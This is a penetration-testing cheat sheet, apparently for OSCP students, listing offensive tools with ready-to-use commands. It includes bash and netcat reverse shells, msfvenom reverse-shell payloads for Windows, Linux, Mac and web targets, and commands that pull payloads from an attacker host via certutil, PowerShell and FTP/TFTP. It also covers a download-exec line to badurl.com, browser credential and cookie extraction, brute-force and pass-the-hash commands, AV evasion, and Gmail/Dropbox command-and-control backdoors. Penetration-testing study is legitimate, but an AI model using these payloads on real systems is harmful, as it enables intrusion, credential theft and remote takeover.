Penetration testing tools
Author: root4loot
A neat list of penetration testing (some red) tools with usage commands and examples for quick reference. Originally intended for OSCP students.
Running (the majority of) these tools against any server without permission is considered illegal so use with extreme caution.
AV Evasion
Veil
Python script designed to generate metasploit payloads that bypass common anti-virus solutions.
Usage:
python Veil-Evasion.py
peCloak
Python script that takes an automated approach to AV evasion.
Usage:
peCloak.py [[options]] [path_to_pe_file]
Example:
python peCloak.py plink.exe
..
New file saved [plink_1540964122_cloaked.exe]
OWASP ZSC
Open source software in Python language which lets you generate customized shellcodes and convert scripts to an obfuscated script.
Usage: ./zsc
zsc> help
[+] shellcode generate shellcode
[+] shellcode>generate to generate shellcode
[+] shellcode>search search for shellcode in shellstorm
[+] shellcode>download download shellcodes from shellstorm
[+] shellcode>shell_storm_list list all shellcodes in shellstorm
[+] obfuscate generate obfuscate code
[+] back Go back one step
[+] clear clears the screen
[+] help show help menu
[+] update check for update
[+] about about owasp zsc
[+] restart restart the software
[+] version software version
[+] exit/quit to exit the software
[+] # insert comment
[+] zsc -h, --help basic interface help
Brute Force
Ncrack
High-speed network authentication cracking tool.
Examples:
SSH: ncrack -u testuser -P wordlist.txt <host> -p 22
RDP: ncrack -u testuser -P wordlist.txt <host> -p 3389
FTP: ncrack -u testuser -P wordlist.txt <host> -p 21
Medusa
Login brute-forcer tool designed to be speedy, parallel and modular.
It supports many protocols: AFP, CVS, FTP, HTTP, IMAP, rlogin, SSH, Subversion, and VNC to name a few.
Syntax:
Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]
Examples:
SSH: medusa -u testuser -P wordlist.txt -h <host> -M ssh
FTP: ncrack -u testuser -P wordlist.txt -T 5 <host> -M ftp
RDP (pass-the-hash):
medusa -M rdp -m PASS:HASH -h <host> -u someuser -p <NTLM_hash>
Spray
Password Spraying tool for Active Directory Credentials. Supports SMB, OWA, Lync, Cisco Web VPN.
Usage:
SMB: spray.sh -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>
OWA: spray.sh -owa <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <RequestsFile>
Lync: spray.sh -lync <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes>
Examples:
SMB: spray.sh -smb 192.168.0.1 users.txt passwords.txt 1 35 SPIDERLABS
OWA: spray.sh -owa 192.168.0.1 users.txt passwords.txt 1 35 post-request.txt
Lync: spray.sh -lync https://lyncdiscover.spiderlabs.com/ users.txt passwords.txt 1 35
Note: For POST requests, replace username and password values with "sprayuser" and "spraypassword".
THC-Hydra
Parallelized login cracker which supports numerous protocols to attack.
It is very fast and flexible, and new modules are easy to add.
Syntax:
hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [service://server[:PORT][/OPT]]
Examples:
SSH: hydra 10.10.10.1 -l testuser -P wordlist.txt -t 4 ssh
RDP: hydra -V -l testuser -P wordlist.txt rdp://10.10.10.1
FTP: hydra 10.10.10.1 -V -l testuser -P wordlist.txt ftp
SMB: hydra 10.10.10.1 -V -l testuser -P wordlist.txt smb
POST form:
hydra -l testuser -p wordlist.txt -e nsr 10.10.10.1 http-post-form "http://10.10.10.1/login.php:username=^USER^&password=^PASS^&submit=Login:<Error message>" -V
Patator
A great multi-purpose brute-forcer, with a modular design and a flexible usage.
Examples:
FTP: patator ftp_login host=10.10.0.1 user=someUser password=FILE0 0=wordlist.txt
SSH: patator ssh_login host=10.10.0.1 user=someUser password=FILE0 0=wordlist.txt
Command & Control
dnscat2
Tool designed to create an encrypted command-and-control (C&C) channel over the DNS protocol, which is an effective tunnel out of almost every network.
Usage:
./dnscat
DropboxC2C
Post-exploitation agent which uses Dropbox Infrastructure for command and control operations.
Structure:
main.py - The "server" part which manages all the agents.
agent.py - The "client" part which does what the server tells.
1. Modify the API Key on agent.py and main.py (the api key must be created from the dropbox web interface)
2. Run setup.bat on a Windows Machine. You will get agent.exe which is the "compiled" agent.
3. Run main.py and run the agent on the compromised server.
gcat
A stealthy Python based backdoor that uses Gmail as a command and control server.
See https://github.com/byt3bl33d3r/gcat
Merlin
Cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.
Quick start guide:
Server: https://github.com/Ne0nd0g/merlin/wiki/Server-Execution-Quick-Start-Guide
Agent: https://github.com/Ne0nd0g/merlin/wiki/Agent-Execution-Quick-Start-Guide
Databases
NoSQLMap
Open source Python-based automated NoSQL MongoDB exploitation tool.
Usage:
python NoSQLMap
SQLmap
Open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.
Usage:
python sqlmap [options]
Examples:
python sqlmap.py -u "http://targetsite.com/vuln.php"
python sqlmap.py -u "http://targetsite.com/login.aspx" --method POST --data "username=foo&password=bar&submit=login" --dbms=mssql --tables
Miscellaneous
httprobe
Take a list of domains and probe for working HTTP and HTTPS servers.
Example usage:
cat domains.txt | httprobe | tee alive.txt
cat domains.txt | httprobe -p http:8080 -p https:4443 | tee alive.txt
RTFM
RTFM (Red Team Field Manual) is a great and useful book, BUT a bit pointless when you have to transcribe it, so this little program will aim to be the spiritual successor to it.
Update database: ./rtfm.py -u
Search for something: ./rtfm.py -e 'Something'
Search by date: ./rtfm.py -A yyyy-mm-dd (or now/today)
List all tags: ./rtfm.py -Dt
-e (search for command): ./rtfm.py -pP -c 'sqlmap'
-t (search for tag): ./rtfm.py -pP -t xss
rescope
Rescope is a tool geared towards pentesters and bugbounty researchers, that aims to make life easier when defining scopes for Burp Suite and OWASP ZAP.
Example usage:
rescope --burp -u bugcrowd.com/bugcrowd -o burpscope.json
rescope --zap --name CoolScope -u bugcrowd.com/bugcrowd -o burpscope.context
rescope --burp -i scopedefinitions.txt -o burpscope.json --silent
Network Related
Airgeddon
A multi-use bash script for Linux systems to audit wireless networks.
Usage:
sudo bash airgeddon.sh
SPARTA
Python GUI application which simplifies network infrastructure penetration testing by aiding the penetration tester in the scanning and enumeration phase.
Usage:
./sparta
SSH
Pivoting with SSH.
Port forwarding:
Local: ssh <gateway> -L <local port to listen>:<remote host>:<remote port>
Remote: ssh <gateway> -R <remote port to bind>:<local host>:<local port>
Dynamic: ssh <gateway> -D <port to bind>
Plink
Pivoting with Plink.exe (SSH for Windows).
Port forwarding:
Local: plink.exe <gateway> -L <local port to listen>:<remote host>:<remote port>
Remote: plink.exe <gateway> -R <remote port to bind>:<local host>:<local port>
Dynamic: plink.exe <gateway> -D <port to bind>
Wifite 2
A tool to attack multiple WEP and WPA encrypted networks at the same time.
Example usage:
./Wifite.py -i wlan0 --wpa
WIFIPhisher
An automated phishing attack tool for Wifi networks.
Example usage:
wifiphisher -i wlan0 -e 'Free Wifi' -hC capture.pcap
Printers
Praedasploit
Contains a number of commonly found printer exploits.
Usage:
See https://github.com/rapid7/metasploit-framework/wiki/Loading-External-Modules
PRET
Printer Exploitation Toolkit - The tool that made dumpster diving obsolete.
Usage:
./pret.py [-h] [-s] [-q] [-d] [-i file] [-o file] target {ps,pjl,pcl}
Example usage:
./pret.py laserjet.lan ps
./pret.py /dev/usb/lp0 pjl
Samba
CrackMapExec
A post-exploitation tool that helps automate assessing the security of large Active Directory networks. CME makes heavy use of the Impacket library.
Examples usage:
crackmapexec <protocol> 192.168.1.0/24
crackmapexec <protocol> ~/targets.txt
Pass-the-hash:
crackmapexec smb <target(s)> -u username -H LMHASH:NTHASH
crackmapexec smb <target(s)> -u username -H NTHASH
Null sessions:
crackmapexec smb <target(s)> -u '' -p ''
enum4linux
A Linux alternative to enum.exe for enumerating data from Windows and Samba hosts.
Usage:
./enum4linux.pl [options] ip
Example:
./enum4linux.pl -U -o 192.168.1.200
nullinux
Internal penetration testing tool for Linux that can be used to enumerate OS information, domain information, shares, directories, and users through SMB.
Usage:
python3 nullinux.py -users -quick DC1.Domain.net
python3 nullinux.py -all 192.168.0.0-5
python3 nullinux.py -shares -U 'Domain\User' -P 'Password1' 10.0.0.1,10.0.0.5
Responder
A LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.
Usage:
./Responder.py [options]
Example:
./Responder.py -I eth0 -wrf
Smbexec
A rapid psexec style attack with samba tools.
Usage:
./smbexec
Main menu:
1. System Enumeration
2. System Exploitation
3. Obtain Hashes
4. Options
5. Exit
Smbclient
FTP-like client to access SMB/CIFS resources on servers. Part of the Samba suite.
Example usage:
Pass-the-hash:
smbclient -U testuser%<nthash> --pw-nt-hash -L 192.168.0.1
smbclient \\\\192.168.0.1\\domain -U testuser%<nthash> --pw-nt-hash
Map drives:
smbclient \\\\192.168.0.1\\sharename$
smbclient \\\\192.168.0.1\\sharename$ -U root%
Wmiexec
A similar approach to smbexec but executing commands through WMI.
Usage:
wmiexec.py [-h] [-share SHARE] [-nooutput] [-debug] [-codec CODEC]
[-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key]
[-dc-ip ip address] [-A authfile]
target [command [command ...]]
Example:
./wmiexec.py -hashes <ntlmhash> Administrator@10.10.0.1
Web related
Arjun
Arjun is a HTTP parameter discovery suite.
Example usage:
Find GET parameters:
python3 arjun.py -u https://api.example.com/endpoint --get
Find POST parameters
python3 arjun.py -u https://api.example.com/endpoint --post
Multi-threading:
python3 arjun.py -u https://api.example.com/endpoint --get -t 22
Delay between requests:
python3 arjun.py -u https://api.example.com/endpoint --get -d 2
Add HTTP headers:
python3 arjun.py -u https://api.example.com/endpoint --get --headers
BeEF Exploitation Framework
A cross-site scripting (XSS) attack framework.
Usage:
./beef
Burp
An awesome graphical tool for testing Web application security.
Usage:
see https://portswigger.net/burp/documentation/contents
CMSmap
Python open source CMS scanner that automates the process of detecting security flaws of the most popular CMSs.
Examples:
cmsmap.py http://example.com
cmsmap.py http://example.com -f W -F --noedb -d
cmsmap.py http://example.com -i targets.txt -o output.txt
cmsmap.py http://example.com -u admin -p passwords.txt
cmsmap.py http://example.com -k hashes.txt -w passwords.txt
CORStest
A simple CORS misconfiguration scanner
Usage:
corstest.py [arguments] infile
Example usage:
corstest.py hosts.txt
Gobuster
Directory/file & DNS busting tool written in Go.
Example usage:
Standard dir bust:
gobuster -u https://example.com -w /path/to/wordlist.txt -n
Display content length:
gobuster -u https://example.com -w /path/to/wordlist.txt -l
Filter results based on status codes 200, 403:
gobuster -u https://example.com -w /path/to/wordlist.txt -s '200,403' -e
Filter results based on file extensions:
gobuster -u https://example.com -w /path/to/wordlist.txt -x 'asp,aspx'
SPartan
Frontpage and Sharepoint fingerprinting and attack tool.
Usage:
python SPartan.py -u http://127.0.0.1 -f -c
-u: host URL
-c: crawl the site for links
-f: perform frontpage scans
--sps: discover sharepoint SOAP services
Parameth
This tool can be used to brute discover GET and POST parameters-
Usage example:
./parameth.py -u https://example.com/somepage.php
./parameth.py -u https://example.com/somepage.php --data <post_data>
./parameth.py -u https://example.com/somepage.php --cookie <cookie>
Tplmap
Server-Side Template Injection and Code Injection Detection and Exploitation Tool.
Usage example:
Test if parameter is vulnerable to SSTI:
./tplmap.py -u 'http://www.target.com/page?name=John'
Launch a pseudo-terminal on the target:
./tplmap.py --os-shell -u 'http://www.target.com/page?name=John'
JShell
A nice little tool to quickly get a Javascript shell from XSS. Running shell.py will generate the js payload and setup a listener on port 33 (default).
Usage:
python shell.py
OWASP ZAP
Open-source web application security scanner.
Usage:
see https://github.com/zaproxy/zaproxy/wiki/Videos
Sublist3r
Fast subdomains enumeration tool for penetration testers.
Example usage:
Enumerate subdomains of specific domain:
python sublist3r.py -d example.com
Show only subdomains which have open ports 80 and 443:
python sublist3r.py -d example.com -p 80,443
Show the results in realtime:
python sublist3r.py -v -d example.com
WPScan
Black box WordPress vulnerability scanner written for security professionals and blog maintainers to test the security of their sites.
Usage:
wpscan [options]
Examples:
wpscan --url http://example.com --enumerate plugins -o output.txt
wpscan --url http://example.com --password-attack=wp-login --usernames=/path/to/usernames.txt --passwords=/path/to/wordlist.txt
Wfuzz
Web application fuzzer.
Example usage:
Standard fuzz:
wfuzz -w /path/to/wordlist.txt https://example.com/FUZZ
Exclude 404 from results:
wfuzz -w /path/to/wordlist.txt https://example.com/FUZZ --hc 404
Exclude results having '117 Ch' (chars):
wfuzz -w /path/to/wordlist.txt https://example.com/FUZZ --hh 117
XSStrike
XSStrike is a Cross Site Scripting detection suite equipped with four hand written parsers, an intelligent payload generator, a powerful fuzzing engine and an incredibly fast crawler.
Usage: xsstrike.py [-h] [-u TARGET] [--data DATA] [-t THREADS] [--seeds SEEDS] [--json] [--path]
[--fuzzer] [--update] [--timeout] [--params] [--crawl] [--blind]
[--verbose] [--skip-dom] [--headers] [--proxy] [-d DELAY] [-e ENCODING]
Scan a single URL:
python xsstrike.py -u "http://example.com/search.php?q=query"
Supplying POST data:
python xsstrike.py -u "http://example.com/search.php" --data "q=query"
Test URL path components:
python xsstrike.py -u "http://example.com/search/form/query" --path
Bruteforce payloads from a file:
python3 xsstrike.py -u "http://example.com/page.php?q=query" -f /path/to/file.txt
Blind XSS:
python xsstrike.py -u http://example.com/page.php?q=query --crawl --blind
More usage commands: https://github.com/s0md3v/XSStrike/wiki/Usage
XXE-FTP
Basic FTP server written in Go to receive payloads from instances of XXE.
Usage:
./xxeftp -p 2121
Wordlist Generators
CeWl
A ruby app which spiders a given URL to a specified depth, optionally following external links, and returns a list of words which can then be used for password crackers such as John the Ripper.
Usage:
cewl [OPTIONS] ... <url>
Example:
cewl http://example.com --depth=4 --write=output.txt
Crunch
Wordlist generator based on criteria you specify. The output from crunch can be sent to the screen, file, or to another program.
Example usage:
crunch 6 6 -t foo@,% >> wordlist
# Generates foo[ALLchars][UPPERCASEletters][0-9]
Wordhound
Wordlist generator that builds a list of password candidates for a specific target website to use with something like Hashcat or Hydra.
Usage:
python wordhound.py https://example.com/
File Transfers (non-interactive)
Linux Target
FTP
Start atftpd service:
service vsftpd start
Create FTP script on target as follows.
Make sure lcd path is writable:echo open <attacker_ip> > ftp.txt echo user anonymous pass >> ftp.txt echo binary >> ftp.txt echo 'lcd /tmp/' >> ftp.txt echo get payload.php >> ftp.txt echo bye >> ftp.txt
Execute script to transfer file:
ftp -n >> /tmp/ftp.txt
SSH
Usage:
scp <source> <destination>
Copy file from attacker to target:
scp username@b:/path/to/file /path/to/destination
Copy file from target to attacker:
scp /path/to/file username@a:/path/to/destination
TFTP
Start atftpd service (see configuration):
service atftpd start
Run the following on target to transfer file:
tftp -i <attacker_ip> GET payload.rb
Windows Target
Certutil
certutil.exe is a Windows CMD utility that comes pre-loaded in Windows as part of the certificate services. It can be used to transfer files from any web server, much like wget, which is very handy.
Example:
certutil -URLCache -f http://<attacker_ip>/payload.exe C:\temp\payload.exe
FTP
Start FTP server:
python -m pyftpdlib --username=USER --password=PASS -p 21
Create FTP script on target:
echo open <attacker_ip> > ftp.txt echo USER >> ftp.txt echo PASS >> ftp.txt echo binary >> ftp.txt echo get payload.exe >> ftp.txt echo bye >> ftp.txt
Run script to transfer file:
ftp -s:ftp.txt
Powershell
Create ps1 script on target as follows:
echo $fileURL = "http://<attacker_ip>/payload.exe" > wget.ps1 echo $fileName = "C:\path_to\payload.exe" >> wget.ps1 echo $webclient = New-Object System.Net.WebClient >> wget.ps1 echo $webclient.DownloadFile($fileURL,$fileName) >> wget.ps1
Execute script to get file from web server:
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
SMB
Start SMB server with Impacket:
python smbserver.py SHARENAME /path/to/shared/folder
Run the following on target to transfer file:
copy \\<attacker_ip>\SHARENAME\payload.exe
TFTP
Start atftpd service (see configuration):
service atftpd start
Run the following on target to transfer file:
tftp -i <attacker_ip> GET payload.exe
Information Gathering
Active
AQUATONE
Aquatone is a tool for visual inspection of websites across a large amount of hosts and is convenient for quickly gaining an overview of HTTP-based attack surface.
Example Usage:
cat targets.txt | aquatone
cat hosts.txt | aquatone -ports 80,443,3000,3001
cat hosts.txt | aquatone -ports large
Discover Scripts
Custom bash scripts used to automate various pentesting tasks.
Usage:
See https://github.com/leebaird/discover
Eyewitness
EyeWitness is designed to take screenshots of websites, provide some server header info, and identify default credentials if possible.
Usage:
./EyeWitness.py -f filename --timeout optionaltimeout --open (Optional)
Examples:
./EyeWitness -f urls.txt --web
./EyeWitness -x urls.xml --timeout 8 --headless
./EyeWitness -f rdp.txt --rdp
HTTPScreenshot
A tool for grabbing screenshots and HTML of large number of websites.
Usage:
./httpscreenshot.py -i \<gnmapFile\> -p -w 40 -a -vH
RegonDog
Reconnaissance Swiss Army Knife.
Features include Censys lookup, NS lookup, Subdomain lookup, Reverse IP lookup, Port scan, CMS detection, Honeypot detection.
Usage:
python ./dog.py
MASSCAN
TCP port scanner, spews SYN packets asynchronously. Capable of scanning entire internet in a few minutes.
Usage:
masscan -p80,8000-8100 10.0.0.0/8
Example:
masscan -vvv -iL hosts.txt -p0-65535 --rate 1000 -oL mass.scan
Banner checking:
masscan 10.0.0.0/8 -p80 --banners --source-ip 192.168.1.200
To see the complete list of options, use the --echo feature:
masscan -p80,8000-8100 10.0.0.0/8 --echo > xxx.conf
masscan -c xxx.conf --rate 1000
Passive
Amass
The OWASP Amass tool suite obtains subdomain names by scraping data sources, recursive brute forcing (warning: active), crawling web archives, permuting/altering names and reverse DNS sweeping.
Usage example:
./amass -src -ip -config amass_config.ini -d owasp.org
ct-exposer
An OSINT tool that discovers sub-domains by searching Certificate Transparency logs. The nice thing about this one is that you can export output to masscan format.
usage: ct-exposer.py [-h] -d DOMAIN [-u] [-m]
optional arguments:
-h, --help show this help message and exit
-d DOMAIN, --domain DOMAIN
domain to query for CT logs, ex: domain.com
-u, --urls ouput results with https:// urls for domains that
resolve, one per line.
-m, --masscan output resolved IP address, one per line. Useful for
masscan IP list import "-iL" format.
Gitrob
A tool to help find potentially sensitive files pushed to public repositories on Github. Gitrob will clone repositories belonging to a user or organization down to a configurable depth and iterate through the commit history and flag files that match signatures for potentially sensitive files. The findings will be presented through a web interface for easy browsing and analysis.Reconnaissance tool for GitHub organizations.
Usage:
./gitrob [options] target [target2] ... [targetN]
Knock
Knockpy is a python tool designed to enumerate subdomains on a target domain through a wordlist. It is designed to scan for DNS zone transfer and to try to bypass the wildcard DNS record automatically if it is enabled.
Example Usage:
Subdomain scan with internal wordlist:
$ knockpy domain.com
Subdomain scan with external wordlist:
$ knockpy domain.com -w wordlist.txt
Resolve domain name and get response headers:
$ knockpy -r domain.com [or IP]
RegonDog
Reconnaissance Swiss Army Knife.
Features include Censys lookup, NS lookup, Subdomain lookup, Reverse IP lookup, Port scan, CMS detection, Honeypot detection.
Usage:
python ./dog.py
SubBrute
A DNS meta-query spider that enumerates DNS records, and subdomains.
Example usage:
./subbrute.py google.com -o google.names
...162 subdomains found...
./subbrute.py -s google.names google.com --type TXT
google.com,"v=spf1 include:_spf.google.com ip4:216.73.93.70/31 ip4:216.73.93.72/31 ~all"
adwords.google.com,"v=spf1 redirect=google.com"
...
./subbrute.py -s google.names google.com --type CNAME
blog.google.com,www.blogger.com,blogger.l.google.com
groups.google.com,groups.l.google.com
...
Subfinder
SubFinder is a subdomain discovery tool that discovers valid subdomains for websites. Designed as a passive framework to be useful for bug bounties and safe for penetration testing.
The following require API keys:
VirustotalAPIKey
PassivetotalUsername
PassivetotalKey
SecurityTrailsKey
RiddlerEmail
RiddlerPassword
CensysUsername
CensysSecret
ShodanAPIKey
Setting API keys:
./subfinder --set-config VirustotalAPIKey=0x41414141
Example usage:
./subfinder -d freelancer.com
./subfinder -d freelancer.com -o output.txt
Subjack
Subdomain Takeover tool written in Go
Example usage:
./subjack -w subdomains.txt -t 100 -timeout 30 -o results.txt -ssl
Sublist3r
Fast subdomains enumeration tool for penetration testers
Example usage:
python sublist3r.py -d example.com
python sublist3r.py -d example.com -p 80,443
Spiderfoot
Reconnaissance tool that automatically queries over 100 public data sources (OSINT) to gather intelligence on IP addresses, domain names, e-mail addresses, names and more.
Usage:
python ./sf.py
Zen
Find emails of Github users.
Example usage:
Find email address of a user:
python zen.py username
Find email addressess of contributors of a repository:
python zen.py https://github.com/username/repository
Find email addresses of members of an organization:
python zen.py organization --org
Save JSON output to a file:
python zen.py https://github.com/username/repository -o /path/to/file
Check if email has appeared in a breach (haveibeenpwned.com API):
python zen.py s0md3v --breach
Payloads
Generic / Kali
Bash reverse shell
bash -i >& /dev/tcp/10.10.10.10/443 0>&1
Netcat reverse shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.10.10 443 > /tmp/f
Web shells
JSP: /opt/SecLists/Web-Shells/JSP/simple-shell.jsp
PHP: /opt/SecLists/Web-Shells/PHP/obfuscated-phpshell.php
Wordpress: /opt/SecLists/Web-Shells/WordPress/access.php
Pentestmonkey:
ASP: /usr/share/webshells/asp/cmd-asp-5.1.asp
/usr/share/webshells/asp/cmdasp.asp
ASPX: /usr/share/webshells/aspx/cmdasp.aspx
CFM: /usr/share/webshells/cfm/cfexec.cfm
JSP: /usr/share/webshells/jsp/cmdjsp.jsp
/usr/share/webshells/jsp/jsp-reverse.jsp
PERL: /usr/share/webshells/perl/perlcmd.cgi
/usr/share/webshells/perl/perl-reverse-shell.pl
PHP: /usr/share/webshells/php/php-backdoor.php
/usr/share/webshells/php-reverse-shell.php
/usr/share/webshells/simple-backdoor.php
Msfvenom
List payloads:
msfvenom -l payloads
- Staged:
/shell/reverse_tcp
&/meterpreter/reverse_tcp
- Stageless:
/shell_reverse_tcp
The majority of payloads below are unstaged.
Windows
x86 Binary: msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 EXITFUNC=thread --platform windows -a x86 -e generic/none -f exe -o payload.exe
x64 Binary: msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 EXITFUNC=thread --platform windows -a x64 -e generic/none -f exe -o payload.exe
Meterpreter: msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=443 -f exe > payload.exe
Shellcode(C): msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f c
Shellcode(Python): msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f c -e x86/s hikata_ga_nai -b "\x00" -f python -v shellcode
Linux
x86 Binary: msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f elf > payload.elf
x64 Binary: msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f elf > payload.elf
Bash: msfvenom -p cmd/unix/reverse_bash LHOST=10.10.10.10 LPORT=443 -f raw > payload.sh
Python: msfvenom -p cmd/unix/reverse_python LHOST=10.10.10.10 LPORT=443 -f raw > payload.py
Shellcode(C): msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -e x86/shikata_ga_nai -b '\x00' -f c
Shellcode(Python): msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -e x86/shikata_ga_nai -b '\x00' -f python -v shellcode
Perl: msfvenom -p cmd/unix/reverse_perl LHOST=10.10.10.10 LPORT=443 -f raw > payload.pl
Mac
x86: msfvenom -p osx/x86/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f macho > payload.macho
x64: msfvenom -p osx/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f macho > payload.macho
Web based
WAR: msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f war > payload.war
JSP: msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f raw > payload.jsp
ASP: msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=443 -f asp > payload.asp
PHP: msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f raw > payload.php && cat payload.php | pbcopy && echo '<?php ' | tr -d '\n' > payload.php && pbpaste >> payload.php
Handler
msf > use exploit/multi/handler
msf exploit(handler) > set ExitOnSession false
msf exploit(handler) > set PAYLOAD windows/ARCH/meterpreter/reverse_tcp
msf exploit(handler) > set EXITFUNC thread
msf exploit(handler) > set LHOST 10.10.10.10
msf exploit(handler) > set LPORT 443
msf exploit(handler) > exploit -j
Other
SharPyShell
SharPyShell (Python) is a tiny and obfuscated ASP.NET webshell that executes commands received by an encrypted channel compiling them in memory at runtime.
Example usage:
python SharPyShell.py generate -p somepassword
python SharPyShell.py interact -u http://target.url/sharpyshell.aspx -p somepassword
Post Exploitation
Linux
LinEnum
Bash script for local linux enumeration & privilege escalation checks.
Usage:
./linenum.sh
linux-exploit-suggester
Linux privilege escalation auditing tool.
Usage:
./linux-exploit-suggester.sh
Linux Exploit Suggester
Perl based linux privesc checker. Running without arguments will perform a ‘uname -r’ to grab the Linux Operating Systems release version, and return a suggestive list of possible exploits. Kernel version can be specified with the -k flag.
Usage:
perl ./Linux_Exploit_Suggester.pl
linuxprivchecker
Linux privilege escalation check script.
Usage:
python linuxprivchecker.py
unix-privesc-check
A bash script that runs on Unix systems (tested on Solaris 9, HPUX 11, Various Linuxes, FreeBSD 6.2). It tries to find misconfigurations that could allow local unprivilged users to escalate privileges to other users or to access local apps (e.g. databases).
Usage:
./unix-privesc-check.sh
Multi-Platform
Pupy
Pupy is an opensource, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool mainly written in python
Usage:
./start-compose.sh
Windows
BrowserGather
Powershell script to extract sensitive browser information from Chrome, Firefox and IE.
First, import the module:
import-module .\BrowserGather.ps1
Extract credentials:
Get-ChromeCreds "C:\Users\sekirkity\AppData\Local\Google\Chrome\User Data\Profile 1\Login Data" | format-list *
Extract cookies:
Get-ChromeCookies "C:\Users\sekirkity\AppData\Local\Google\Chrome\User Data\Profile 1\Cookies" | format-list *
Empire
Powerful PowerShell & Python post-exploitation agent.
Usage:
./empire
Tips and tricks:
https://enigma0x3.net/2015/08/26/empire-tips-and-tricks/
Unicorn
A simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory.
Usage:
python unicorn.py payload reverse_ipaddr port <optional hta or macro, crt>
Help Menu: python unicorn.py --help
Example usage:
PS: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443
PS Down/Exec: python unicorn.py windows/download_exec url=http://badurl.com/payload.exe
Custom PS1: python unicorn.py <path to ps1 file>
Custom Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode (formatted 0x00)
Sherlock
PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities.
Usage:
Add desired fuction to end of file.
powershell -nologo -executionpolicy bypass -file sherlock.ps1
p0wnedShell
Offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier.
Example usage:
Run as x64 binary and bypass Applocker:
cd \Windows\Microsoft.NET\Framework\v4.0.30319
InstallUtil.exe /logfile= /LogToConsole=false /U C:\p0wnedShell\p0wnedShellx86.exe
Windows Exploit Suggester - Next Generation (WES-NG)
WES-NG is a tool (Python) based on the output of Windows’ systeminfo utility which provides the list of vulnerabilities the OS is vulnerable to, including any exploits for these vulnerabilities. Every Windows OS between Windows XP and Windows 10, including their Windows Server counterparts, is supported.
How to use:
1. Generate systeminfo:
systeminfo > systeminfo.txt
2. Run WES-NG against it:
wes.py systeminfo.txt
See also: Eliminating False Positives (https://github.com/bitsadmin/wesng/wiki/Eliminating-false-positives)
Windows-Exploit-Suggester
This tool compares a targets patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins.
Usage:
./windows-exploit-suggester.py --update